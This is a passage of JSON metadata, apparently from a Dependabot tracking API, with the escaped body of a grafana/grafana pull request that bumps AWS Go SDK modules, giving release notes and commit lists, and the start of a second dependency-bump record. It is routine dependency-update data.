[github.com/aws/aws-sdk-go-v2/service/secretsmanager](https://github.com/aws/aws-sdk-go-v2) | `1.40.1` | `1.41.6` |\n\n\nUpdates `github.com/aws/aws-sdk-go` from 1.55.7 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.32.15 to 1.32.16\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bc9c51d733fd437a60a8710531477ca0347dcc4\"\u003e\u003ccode\u003e9bc9c51\u003c/code\u003e\u003c/a\u003e Release 2026-04-17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2b41455a8d88032b9b76b0bafbe23de0a61a6f29\"\u003e\u003ccode\u003e2b41455\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2327a1b15b5f16414e715325bc9579082fde0767\"\u003e\u003ccode\u003e2327a1b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9225797aa8ce8661d61f4628973aface4e01c922\"\u003e\u003ccode\u003e9225797\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7b6f675adb365c7b069aaf2a8e81c4b8f8a5d08e\"\u003e\u003ccode\u003e7b6f675\u003c/code\u003e\u003c/a\u003e Bump smithy-go to 1.25 (again) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3390\"\u003e#3390\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.32.15...config/v1.32.16\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/credentials` from 1.19.14 to 1.19.15\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bc9c51d733fd437a60a8710531477ca0347dcc4\"\u003e\u003ccode\u003e9bc9c51\u003c/code\u003e\u003c/a\u003e Release 2026-04-17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2b41455a8d88032b9b76b0bafbe23de0a61a6f29\"\u003e\u003ccode\u003e2b41455\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2327a1b15b5f16414e715325bc9579082fde0767\"\u003e\u003ccode\u003e2327a1b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9225797aa8ce8661d61f4628973aface4e01c922\"\u003e\u003ccode\u003e9225797\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7b6f675adb365c7b069aaf2a8e81c4b8f8a5d08e\"\u003e\u003ccode\u003e7b6f675\u003c/code\u003e\u003c/a\u003e Bump smithy-go to 1.25 (again) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3390\"\u003e#3390\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c8b6a97220901cccfd8a06f6f25aef65a967384c\"\u003e\u003ccode\u003ec8b6a97\u003c/code\u003e\u003c/a\u003e Release 2026-04-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4a05c2ba948715d305aff4519154abe2c4799246\"\u003e\u003ccode\u003e4a05c2b\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6cd4cc9201382be2638c8b4951b5d92de73c1161\"\u003e\u003ccode\u003e6cd4cc9\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3153bed494fb9e426640b30c7b91be0510b20362\"\u003e\u003ccode\u003e3153bed\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fe3cef6cc115a2915f5410c739dc73d51553d709\"\u003e\u003ccode\u003efe3cef6\u003c/code\u003e\u003c/a\u003e Make AccountIDEndpointRouting aware of bdd endpoints (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3387\"\u003e#3387\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/credentials/v1.19.14...credentials/v1.19.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/cloudwatch` from 1.45.3 to 1.56.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5a964704cb2640ed57a74b9b37a53dcda7b6b7dd\"\u003e\u003ccode\u003e5a96470\u003c/code\u003e\u003c/a\u003e Release 2024-12-19\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/653aa807b912e104f5e1e84e0510b4dffd76c751\"\u003e\u003ccode\u003e653aa80\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d02b239e896c5791e295c9a30a5281f56a8f7c39\"\u003e\u003ccode\u003ed02b239\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/698d709c21bc7922489aaba8c8207c9d7253c2fe\"\u003e\u003ccode\u003e698d709\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/885de40869f9bcee29ad11d60967aa0f1b571d46\"\u003e\u003ccode\u003e885de40\u003c/code\u003e\u003c/a\u003e Fix improper use of Printf-style functions (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2934\"\u003e#2934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/858298a55393392fb161c5bd0ae3b9c5251996bf\"\u003e\u003ccode\u003e858298a\u003c/code\u003e\u003c/a\u003e Release 2024-12-18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f58264af808a255782999422056bccb06552dcbd\"\u003e\u003ccode\u003ef58264a\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/df31082d87044a000a1524dbb654651f32713e10\"\u003e\u003ccode\u003edf31082\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/346690ed8f5b974ab26532aa93d5fa92a58d3571\"\u003e\u003ccode\u003e346690e\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/45154546e09b48505c8798f7e5f3846ee1e0453a\"\u003e\u003ccode\u003e4515454\u003c/code\u003e\u003c/a\u003e Release 2024-12-17\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/rds/v1.45.3...service/ssm/v1.56.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ec2` from 1.296.0 to 1.299.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/18fee87f2c0615b0e5c3f28f1b95af810a9e77b5\"\u003e\u003ccode\u003e18fee87\u003c/code\u003e\u003c/a\u003e Release 2026-04-22\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0ce157cd6b5427066ddb682a4967a3047230de4b\"\u003e\u003ccode\u003e0ce157c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/68cdb4a02d56b9d932fbfed22660cfa64e815ef6\"\u003e\u003ccode\u003e68cdb4a\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f399972fb759f6ffd315963de511da785ef408e6\"\u003e\u003ccode\u003ef399972\u003c/code\u003e\u003c/a\u003e Bump Smithy from 1.67.0 to 1.69.0 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3394\"\u003e#3394\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3c19a9b3eb17f48f6b9fc1cad644859d062775ad\"\u003e\u003ccode\u003e3c19a9b\u003c/code\u003e\u003c/a\u003e Release 2026-04-21\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1dfac3ec5a6c560e6fee389d0f1f364eb57ae616\"\u003e\u003ccode\u003e1dfac3e\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d842df6fcef5ecc94e2133cb1d96fac4926aadb4\"\u003e\u003ccode\u003ed842df6\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ffeb52a25097274529920d8f91b4ca27f7b636a9\"\u003e\u003ccode\u003effeb52a\u003c/code\u003e\u003c/a\u003e bump to latest smithy-go codegen (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3393\"\u003e#3393\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e839880e8d30897bd8a7684d83626d81f82c565a\"\u003e\u003ccode\u003ee839880\u003c/code\u003e\u003c/a\u003e Release 2026-04-20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4c898c88577f4102793d3e15de05ad3b5b1e2ef5\"\u003e\u003ccode\u003e4c898c8\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ec2/v1.296.0...service/ec2/v1.299.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/oam` from 1.18.3 to 1.23.16\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/54aed732316b5162e5c4382a1f2d3891175d0254\"\u003e\u003ccode\u003e54aed73\u003c/code\u003e\u003c/a\u003e Release 2025-02-18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/082781faee876f9d612fa7c113b4304a29766b14\"\u003e\u003ccode\u003e082781f\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3ed185b604684a86547e679154975f1914f97312\"\u003e\u003ccode\u003e3ed185b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/03da7378d668622cd880ec741d57e93cc370efa1\"\u003e\u003ccode\u003e03da737\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c8a8ccb619ffbfe00e99a83e99729b948f20be29\"\u003e\u003ccode\u003ec8a8ccb\u003c/code\u003e\u003c/a\u003e Bump go version to 1.22 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3010\"\u003e#3010\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8b7c7bf6d9a1c63d0c5262724ae8a15a44e366a6\"\u003e\u003ccode\u003e8b7c7bf\u003c/code\u003e\u003c/a\u003e fix missing AccountIDEndpointMode binding (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3013\"\u003e#3013\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/90f9d1081a37acaf792ccda5bfb07e2ee7590a9e\"\u003e\u003ccode\u003e90f9d10\u003c/code\u003e\u003c/a\u003e Release 2025-02-17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/40dd351c61c016749a3f4105cca0c965e7c66d7b\"\u003e\u003ccode\u003e40dd351\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/06352dfafe9067da1956229d6925efed328d5ff6\"\u003e\u003ccode\u003e06352df\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/833566b553122ebd5bfa1237ee7c905a8db0d687\"\u003e\u003ccode\u003e833566b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.18.3...service/dax/v1.23.16\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi` from 1.26.6 to 1.31.11\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/67db6904b816b95073883b7ad378384c4839b28c\"\u003e\u003ccode\u003e67db690\u003c/code\u003e\u003c/a\u003e Release 2025-09-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/32ee1b5d75fc303c0626a6f5e769f4e08cc491a8\"\u003e\u003ccode\u003e32ee1b5\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0b431223309a815cffc048072556aa651ee1455f\"\u003e\u003ccode\u003e0b43122\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/44786d920f3627b73a99e81c7b6399dbfcf7ab42\"\u003e\u003ccode\u003e44786d9\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c98edb73809256823906d7e307ecf3c9abc16700\"\u003e\u003ccode\u003ec98edb7\u003c/code\u003e\u003c/a\u003e update internal endpts comment that was wrong (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3194\"\u003e#3194\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/88da3c8c5569dece0e99802dab638faa047a0db0\"\u003e\u003ccode\u003e88da3c8\u003c/code\u003e\u003c/a\u003e Release 2025-09-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/74a74fc179f8bbd879383cc75fa29a1937266dcc\"\u003e\u003ccode\u003e74a74fc\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5e6f7ae6139ca69044bb706664b4dbdc31227a32\"\u003e\u003ccode\u003e5e6f7ae\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0e722ab42ff6bc6bb810c2937b8e1b41937e17c3\"\u003e\u003ccode\u003e0e722ab\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/41a7d004b9ff794f6007d30168afc825031f2c61\"\u003e\u003ccode\u003e41a7d00\u003c/code\u003e\u003c/a\u003e Release 2025-09-24\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.26.6...config/v1.31.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/secretsmanager` from 1.40.1 to 1.41.6\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bc9c51d733fd437a60a8710531477ca0347dcc4\"\u003e\u003ccode\u003e9bc9c51\u003c/code\u003e\u003c/a\u003e Release 2026-04-17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2b41455a8d88032b9b76b0bafbe23de0a61a6f29\"\u003e\u003ccode\u003e2b41455\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2327a1b15b5f16414e715325bc9579082fde0767\"\u003e\u003ccode\u003e2327a1b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9225797aa8ce8661d61f4628973aface4e01c922\"\u003e\u003ccode\u003e9225797\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7b6f675adb365c7b069aaf2a8e81c4b8f8a5d08e\"\u003e\u003ccode\u003e7b6f675\u003c/code\u003e\u003c/a\u003e Bump smithy-go to 1.25 (again) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3390\"\u003e#3390\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c8b6a97220901cccfd8a06f6f25aef65a967384c\"\u003e\u003ccode\u003ec8b6a97\u003c/code\u003e\u003c/a\u003e Release 2026-04-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4a05c2ba948715d305aff4519154abe2c4799246\"\u003e\u003ccode\u003e4a05c2b\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6cd4cc9201382be2638c8b4951b5d92de73c1161\"\u003e\u003ccode\u003e6cd4cc9\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3153bed494fb9e426640b30c7b91be0510b20362\"\u003e\u003ccode\u003e3153bed\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fe3cef6cc115a2915f5410c739dc73d51553d709\"\u003e\u003ccode\u003efe3cef6\u003c/code\u003e\u003c/a\u003e Make AccountIDEndpointRouting aware of bdd endpoints (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3387\"\u003e#3387\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.40.1...v1.41.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/sts` from 1.41.10 to 1.42.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ee5e3f05637540596cc7aab1359742000a8d533a\"\u003e\u003ccode\u003eee5e3f0\u003c/code\u003e\u003c/a\u003e Release 2023-11-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b65c226f47aa1f837699664bdc65c3c3e3611765\"\u003e\u003ccode\u003eb65c226\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7a194b9b0344774a5af100d11ea2066c5b0cf234\"\u003e\u003ccode\u003e7a194b9\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0cb924a0007bc681d12f382a604368e0660827ee\"\u003e\u003ccode\u003e0cb924a\u003c/code\u003e\u003c/a\u003e Add support for configured endpoints. (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2328\"\u003e#2328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/61039fea9cc9e080c53382850c87685b5406fd68\"\u003e\u003ccode\u003e61039fe\u003c/code\u003e\u003c/a\u003e Release 2023-10-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/797e0560769725635218fc30a2554c1bbaccc01b\"\u003e\u003ccode\u003e797e056\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/822585d3f621a7c5844584d8e471c32f852702aa\"\u003e\u003ccode\u003e822585d\u003c/code\u003e\u003c/a\u003e Update SDK's smithy-go dependency to v1.16.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/abf753db747dd256f3ee69712a19d1d3dc681f23\"\u003e\u003ccode\u003eabf753d\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/99861c071109ce5ee4f1cb3b72ead2062b3bd86c\"\u003e\u003ccode\u003e99861c0\u003c/code\u003e\u003c/a\u003e lang: bump minimum go version to 1.19 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2338\"\u003e#2338\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2ac0a53ac45acaadc4526fd25b643dc46032b02a\"\u003e\u003ccode\u003e2ac0a53\u003c/code\u003e\u003c/a\u003e Release 2023-10-30\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ecs/v1.41.10...service/s3/v1.42.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e","html_url":"https://github.com/grafana/grafana/pull/124765","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/grafana%2Fgrafana/issues/124765","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/124765/packages"}},{"old_version":"1.50.36","new_version":"1.55.8","update_type":"minor","path":null,"pr_created_at":"2026-05-12T02:01:36.000Z","version_change":"1.50.36 → 1.55.8","issue":{"uuid":"4425616591","node_id":"PR_kwDOFyRkIM7afguh","number":10766,"state":"closed","title":"Bump the all-go-mod-patch-and-minor group across 2 directories with 43 updates","user":"dependabot[bot]","labels":["ok-to-test","size/XXL","dependabot"],"assignees":[],"locked":false,"comments_count":4,"pull_request":true,"closed_at":"2026-05-19T04:22:36.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-12T02:01:36.000Z","updated_at":"2026-05-19T04:22:38.000Z","time_to_close":613260,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"all-go-mod-patch-and-minor","update_count":43,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.50.36","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2","old_version":"1.30.1","new_version":"1.41.7","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.26.6","new_version":"1.32.17","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ec2","old_version":"1.167.1","new_version":"1.301.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ecr","old_version":"1.27.4","new_version":"1.57.2","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/eks-anywhere-packages","old_version":"0.4.5","new_version":"0.4.15","repository_url":"https://github.com/aws/eks-anywhere-packages"},{"name":"github.com/aws/etcdadm-bootstrap-provider","old_version":"1.0.17","new_version":"1.0.19","repository_url":"https://github.com/aws/etcdadm-bootstrap-provider"},{"name":"github.com/